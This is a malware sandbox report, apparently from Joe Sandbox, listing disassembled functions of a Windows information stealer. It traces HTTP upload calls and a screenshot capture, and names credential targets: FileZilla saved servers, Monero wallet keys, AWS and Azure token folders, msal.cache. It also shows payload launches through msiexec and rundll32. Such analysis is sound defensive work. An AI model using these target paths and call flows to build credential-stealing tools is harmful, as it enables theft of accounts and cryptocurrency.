                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                    • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                    • API String ID: 1942843190-555421843
                    • Opcode ID: 305d2f78e3fe93e300bc5ebb22ec0b795915dc669d75dc7d004a77433daac028
                    • Instruction ID: bd8c10570c792efcb81e76d249e4ea09d8dcd7cad126e0e2c25c3f2cba19bf74
                    • Opcode Fuzzy Hash: 305d2f78e3fe93e300bc5ebb22ec0b795915dc669d75dc7d004a77433daac028
                    • Instruction Fuzzy Hash: 3AD141B1D10108ABDB04FBE1DD96EEE7739AF14304F50492EF102A6091DF7CAA59CB69
                    Function 00475960 Relevance: 39.0, APIs: 17, Strings: 5, Instructions: 495networkstringmemoryCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 0048A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0048A7E6
                      • Part of subcall function 004747B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00474839
                      • Part of subcall function 004747B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00474849
                      • Part of subcall function 0048A740: lstrcpy.KERNEL32(00490E17,00000000), ref: 0048A788
                    • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004759F8
                    • StrCmpCA.SHLWAPI(?,0123E858), ref: 00475A13
                    • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00475B93
                    • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,0123E7F8,00000000,?,0123A4F0,00000000,?,00491A1C), ref: 00475E71
                    • lstrlen.KERNEL32(00000000), ref: 00475E82
                    • GetProcessHeap.KERNEL32(00000000,?), ref: 00475E93
                    • RtlAllocateHeap.NTDLL(00000000), ref: 00475E9A
                    • lstrlen.KERNEL32(00000000), ref: 00475EAF
                    • lstrlen.KERNEL32(00000000), ref: 00475ED8
                    • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00475EF1
                    • lstrlen.KERNEL32(00000000,?,?), ref: 00475F1B
                    • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00475F2F
                    • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00475F4C
                    • InternetCloseHandle.WININET(00000000), ref: 00475FB0
                    • InternetCloseHandle.WININET(00000000), ref: 00475FBD
                    • HttpOpenRequestA.WININET(00000000,0123E778,?,0123E298,00000000,00000000,00400100,00000000), ref: 00475BF8
                      • Part of subcall function 0048A9B0: lstrlen.KERNEL32(?,01238FF0,?,\Monero\wallet.keys,00490E17), ref: 0048A9C5
                      • Part of subcall function 0048A9B0: lstrcpy.KERNEL32(00000000), ref: 0048AA04
                      • Part of subcall function 0048A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0048AA12
                      • Part of subcall function 0048A8A0: lstrcpy.KERNEL32(?,00490E17), ref: 0048A905
                      • Part of subcall function 0048A920: lstrcpy.KERNEL32(00000000,?), ref: 0048A972
                      • Part of subcall function 0048A920: lstrcat.KERNEL32(00000000), ref: 0048A982
                    • InternetCloseHandle.WININET(00000000), ref: 00475FC7
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1700682894.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.1700666613.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.00000000006BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.00000000006CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000957000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701033572.0000000000970000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701132073.0000000000B0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701145380.0000000000B10000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                    • String ID: "$"$------$------$------
                    • API String ID: 874700897-2180234286
                    • Opcode ID: efca1165f0294f7ef923cf3d86f9b0a1142c9142d640c9646f2890d99b166fab
                    • Instruction ID: f32e30f2691db6368a5935578667294b91eb73444db1b378987104bbd25aa1fb
                    • Opcode Fuzzy Hash: efca1165f0294f7ef923cf3d86f9b0a1142c9142d640c9646f2890d99b166fab
                    • Instruction Fuzzy Hash: E6122171820118AAEB15FBA1DC95FEE7338BF14704F5045AFF10662091DFB82A5ACF69
                    Function 0047CEF0 Relevance: 30.4, APIs: 20, Instructions: 375stringmemoryfileCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 0048A740: lstrcpy.KERNEL32(00490E17,00000000), ref: 0048A788
                      • Part of subcall function 0048A9B0: lstrlen.KERNEL32(?,01238FF0,?,\Monero\wallet.keys,00490E17), ref: 0048A9C5
                      • Part of subcall function 0048A9B0: lstrcpy.KERNEL32(00000000), ref: 0048AA04
                      • Part of subcall function 0048A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0048AA12
                      • Part of subcall function 0048A8A0: lstrcpy.KERNEL32(?,00490E17), ref: 0048A905
                      • Part of subcall function 00488B60: GetSystemTime.KERNEL32(00490E1A,0123A250,004905AE,?,?,004713F9,?,0000001A,00490E1A,00000000,?,01238FF0,?,\Monero\wallet.keys,00490E17), ref: 00488B86
                      • Part of subcall function 0048A920: lstrcpy.KERNEL32(00000000,?), ref: 0048A972
                      • Part of subcall function 0048A920: lstrcat.KERNEL32(00000000), ref: 0048A982
                    • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0047CF83
                    • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0047D0C7
                    • RtlAllocateHeap.NTDLL(00000000), ref: 0047D0CE
                    • lstrcat.KERNEL32(?,00000000), ref: 0047D208
                    • lstrcat.KERNEL32(?,00491478), ref: 0047D217
                    • lstrcat.KERNEL32(?,00000000), ref: 0047D22A
                    • lstrcat.KERNEL32(?,0049147C), ref: 0047D239
                    • lstrcat.KERNEL32(?,00000000), ref: 0047D24C
                    • lstrcat.KERNEL32(?,00491480), ref: 0047D25B
                    • lstrcat.KERNEL32(?,00000000), ref: 0047D26E
                    • lstrcat.KERNEL32(?,00491484), ref: 0047D27D
                    • lstrcat.KERNEL32(?,00000000), ref: 0047D290
                    • lstrcat.KERNEL32(?,00491488), ref: 0047D29F
                    • lstrcat.KERNEL32(?,00000000), ref: 0047D2B2
                    • lstrcat.KERNEL32(?,0049148C), ref: 0047D2C1
                    • lstrcat.KERNEL32(?,00000000), ref: 0047D2D4
                    • lstrcat.KERNEL32(?,00491490), ref: 0047D2E3
                      • Part of subcall function 0048A820: lstrlen.KERNEL32(00474F05,?,?,00474F05,00490DDE), ref: 0048A82B
                      • Part of subcall function 0048A820: lstrcpy.KERNEL32(00490DDE,00000000), ref: 0048A885
                    • lstrlen.KERNEL32(?), ref: 0047D32A
                    • lstrlen.KERNEL32(?), ref: 0047D339
                      • Part of subcall function 0048AA70: StrCmpCA.SHLWAPI(01239060,0047A7A7,?,0047A7A7,01239060), ref: 0048AA8F
                    • DeleteFileA.KERNEL32(00000000), ref: 0047D3B4
                    Memory Dump Source
                    • Source File: 00000000.00000002.1700682894.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.1700666613.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.00000000006BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.00000000006CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000957000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701033572.0000000000970000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701132073.0000000000B0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701145380.0000000000B10000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                    • String ID:
                    • API String ID: 1956182324-0
                    • Opcode ID: 1e0bfbdc3d21719cfe82fbc4a5fadf863a4ca7c8155f73d7ba0f194cef0f349a
                    • Instruction ID: 932373735b0208a54a1d376726386cefe792610e5ef07ff2e84f2928986d67d8
                    • Opcode Fuzzy Hash: 1e0bfbdc3d21719cfe82fbc4a5fadf863a4ca7c8155f73d7ba0f194cef0f349a
                    • Instruction Fuzzy Hash: 0EE16FB1910108ABDB04FBA1DD96EEE7379AF14304F10455BF106A20A1DE7CAA59CB7A
                    Function 0047C990 Relevance: 24.9, APIs: 13, Strings: 1, Instructions: 384filestringCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 0048A740: lstrcpy.KERNEL32(00490E17,00000000), ref: 0048A788
                      • Part of subcall function 0048A920: lstrcpy.KERNEL32(00000000,?), ref: 0048A972
                      • Part of subcall function 0048A920: lstrcat.KERNEL32(00000000), ref: 0048A982
                      • Part of subcall function 0048A8A0: lstrcpy.KERNEL32(?,00490E17), ref: 0048A905
                      • Part of subcall function 0048A9B0: lstrlen.KERNEL32(?,01238FF0,?,\Monero\wallet.keys,00490E17), ref: 0048A9C5
                      • Part of subcall function 0048A9B0: lstrcpy.KERNEL32(00000000), ref: 0048AA04
                      • Part of subcall function 0048A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0048AA12
                    • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,0123D4C8,00000000,?,0049144C,00000000,?,?), ref: 0047CA6C
                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0047CA89
                    • GetFileSize.KERNEL32(00000000,00000000), ref: 0047CA95
                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0047CAA8
                    • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0047CAD9
                    • StrStrA.SHLWAPI(?,0123D4E0,00490B52), ref: 0047CAF7
                    • StrStrA.SHLWAPI(00000000,0123D4F8), ref: 0047CB1E
                    • StrStrA.SHLWAPI(?,0123D8C0,00000000,?,00491458,00000000,?,00000000,00000000,?,01239130,00000000,?,00491454,00000000,?), ref: 0047CCA2
                    • StrStrA.SHLWAPI(00000000,0123D760), ref: 0047CCB9
                      • Part of subcall function 0047C820: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0047C871
                      • Part of subcall function 0047C820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0047C87C
                    • StrStrA.SHLWAPI(?,0123D760,00000000,?,0049145C,00000000,?,00000000,01239210), ref: 0047CD5A
                    • StrStrA.SHLWAPI(00000000,01238F40), ref: 0047CD71
                      • Part of subcall function 0047C820: lstrcat.KERNEL32(?,00490B46), ref: 0047C943
                      • Part of subcall function 0047C820: lstrcat.KERNEL32(?,00490B47), ref: 0047C957
                      • Part of subcall function 0047C820: lstrcat.KERNEL32(?,00490B4E), ref: 0047C978
                    • lstrlen.KERNEL32(00000000), ref: 0047CE44
                    • CloseHandle.KERNEL32(00000000), ref: 0047CE9C
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1700682894.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.1700666613.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.00000000006BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.00000000006CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000957000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701033572.0000000000970000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701132073.0000000000B0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701145380.0000000000B10000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                    • String ID:
                    • API String ID: 3744635739-3916222277
                    • Opcode ID: 1d3239e68d4af6b02ca1a8cd2ebac696917befeba3ab7d3428659ee856a3fff3
                    • Instruction ID: c5600550a37edd5d3bf85b6176c9f3e2d262c8d48e4a681ee76ffcb5c6b7f945
                    • Opcode Fuzzy Hash: 1d3239e68d4af6b02ca1a8cd2ebac696917befeba3ab7d3428659ee856a3fff3
                    • Instruction Fuzzy Hash: E4E110B1800108ABDB14FBA5DC91FEE7779AF14304F40456FF10662191EF786A9ACB7A
                    Function 00488320 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 196registryCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 0048A740: lstrcpy.KERNEL32(00490E17,00000000), ref: 0048A788
                    • RegOpenKeyExA.ADVAPI32(00000000,0123B328,00000000,00020019,00000000,004905B6), ref: 004883A4
                    • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00488426
                    • wsprintfA.USER32 ref: 00488459
                    • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0048847B
                    • RegCloseKey.ADVAPI32(00000000), ref: 0048848C
                    • RegCloseKey.ADVAPI32(00000000), ref: 00488499
                      • Part of subcall function 0048A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0048A7E6
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1700682894.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.1700666613.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.00000000006BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.00000000006CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000957000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701033572.0000000000970000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701132073.0000000000B0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701145380.0000000000B10000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: CloseOpenlstrcpy$Enumwsprintf
                    • String ID: - $%s\%s$?
                    • API String ID: 3246050789-3278919252
                    • Opcode ID: 37474cb59c04230c869e177ddb732a9899ba30e562d32cb8e61947892a3bdbfa
                    • Instruction ID: 14bd2cc04e77d0c6836271b3606689e176899d5232f9c6f1af566b15404b8a51
                    • Opcode Fuzzy Hash: 37474cb59c04230c869e177ddb732a9899ba30e562d32cb8e61947892a3bdbfa
                    • Instruction Fuzzy Hash: 1A811EB1910118ABEB24EB50CC91FEE77B9FF08704F4086DAE109A6140DF796B85CFA5
                    Function 00484D70 Relevance: 22.6, APIs: 6, Strings: 9, Instructions: 123stringCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00488DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00488E0B
                    • lstrcat.KERNEL32(?,00000000), ref: 00484DB0
                    • lstrcat.KERNEL32(?,\.azure\), ref: 00484DCD
                      • Part of subcall function 00484910: wsprintfA.USER32 ref: 0048492C
                      • Part of subcall function 00484910: FindFirstFileA.KERNEL32(?,?), ref: 00484943
                    • lstrcat.KERNEL32(?,00000000), ref: 00484E3C
                    • lstrcat.KERNEL32(?,\.aws\), ref: 00484E59
                      • Part of subcall function 00484910: StrCmpCA.SHLWAPI(?,00490FDC), ref: 00484971
                      • Part of subcall function 00484910: StrCmpCA.SHLWAPI(?,00490FE0), ref: 00484987
                      • Part of subcall function 00484910: FindNextFileA.KERNEL32(000000FF,?), ref: 00484B7D
                      • Part of subcall function 00484910: FindClose.KERNEL32(000000FF), ref: 00484B92
                    • lstrcat.KERNEL32(?,00000000), ref: 00484EC8
                    • lstrcat.KERNEL32(?,\.IdentityService\), ref: 00484EE5
                      • Part of subcall function 00484910: wsprintfA.USER32 ref: 004849B0
                      • Part of subcall function 00484910: StrCmpCA.SHLWAPI(?,004908D2), ref: 004849C5
                      • Part of subcall function 00484910: wsprintfA.USER32 ref: 004849E2
                      • Part of subcall function 00484910: PathMatchSpecA.SHLWAPI(?,?), ref: 00484A1E
                      • Part of subcall function 00484910: lstrcat.KERNEL32(?,0123E758), ref: 00484A4A
                      • Part of subcall function 00484910: lstrcat.KERNEL32(?,00490FF8), ref: 00484A5C
                      • Part of subcall function 00484910: lstrcat.KERNEL32(?,?), ref: 00484A70
                      • Part of subcall function 00484910: lstrcat.KERNEL32(?,00490FFC), ref: 00484A82
                      • Part of subcall function 00484910: lstrcat.KERNEL32(?,?), ref: 00484A96
                      • Part of subcall function 00484910: CopyFileA.KERNEL32(?,?,00000001), ref: 00484AAC
                      • Part of subcall function 00484910: DeleteFileA.KERNEL32(?), ref: 00484B31
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1700682894.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.1700666613.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.00000000006BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.00000000006CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000957000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701033572.0000000000970000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701132073.0000000000B0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701145380.0000000000B10000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                    • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                    • API String ID: 949356159-974132213
                    • Opcode ID: 7035b97e70c409ac4ea80df5c5edf5cb985b86d98c3ec131f575995ea4fb75d5
                    • Instruction ID: fae10b047aa6e019273639bd35fe93c8ed3a74a4d1139226f5eadfebadd65bda
                    • Opcode Fuzzy Hash: 7035b97e70c409ac4ea80df5c5edf5cb985b86d98c3ec131f575995ea4fb75d5
                    • Instruction Fuzzy Hash: B441A4B9A4020466DB14F760EC47FED3638AB64704F00499AB149664C1FEFD5BC98B96
                    Function 00489010 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 184COMMON
                    Download Yara Rule
                    APIs
                    • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 0048906C
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1700682894.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.1700666613.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.00000000006BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.00000000006CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000957000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701033572.0000000000970000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701132073.0000000000B0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701145380.0000000000B10000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: CreateGlobalStream
                    • String ID: image/jpeg
                    • API String ID: 2244384528-3785015651
                    • Opcode ID: b5383eff8e399f357df9f3ad0ff2303d067bde93fda2beb21b8564e820eb7ffd
                    • Instruction ID: e8b8174d5854b946799761b5b1543a04bee3eb421270c405a1fad11c2a21c3b1
                    • Opcode Fuzzy Hash: b5383eff8e399f357df9f3ad0ff2303d067bde93fda2beb21b8564e820eb7ffd
                    • Instruction Fuzzy Hash: 847110B5910208AFDB04EFE4DC89FEEB7B9BF48300F148619F515A7290DB38A945CB65
                    Function 00482E30 Relevance: 19.7, APIs: 3, Strings: 8, Instructions: 469COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 0048A740: lstrcpy.KERNEL32(00490E17,00000000), ref: 0048A788
                    • ShellExecuteEx.SHELL32(0000003C), ref: 004831C5
                    • ShellExecuteEx.SHELL32(0000003C), ref: 0048335D
                    • ShellExecuteEx.SHELL32(0000003C), ref: 004834EA
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1700682894.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.1700666613.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.00000000006BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.00000000006CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000957000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701033572.0000000000970000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701132073.0000000000B0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701145380.0000000000B10000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: ExecuteShell$lstrcpy
                    • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                    • API String ID: 2507796910-3625054190
                    • Opcode ID: 103207045ac33aa0ac10e9f0ad1a7b152faa0cbd8d7c49280ca70c8911f63b8e
                    • Instruction ID: c69f48aa7c373b186fcf8b67230963c7b8886ced6050d97153745d908a6f738e
                    • Opcode Fuzzy Hash: 103207045ac33aa0ac10e9f0ad1a7b152faa0cbd8d7c49280ca70c8911f63b8e
                    • Instruction Fuzzy Hash: 8B121E718001089AEB15FBA1CC92FDDB778AF14304F50495FE50666191EFBC2B9ACB6A
                    Function 004852C0 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 139stringCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 0048A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0048A7E6
                      • Part of subcall function 00476280: InternetOpenA.WININET(00490DFE,00000001,00000000,00000000,00000000), ref: 004762E1
                      • Part of subcall function 00476280: StrCmpCA.SHLWAPI(?,0123E858), ref: 00476303
                      • Part of subcall function 00476280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00476335
                      • Part of subcall function 00476280: HttpOpenRequestA.WININET(00000000,GET,?,0123E298,00000000,00000000,00400100,00000000), ref: 00476385
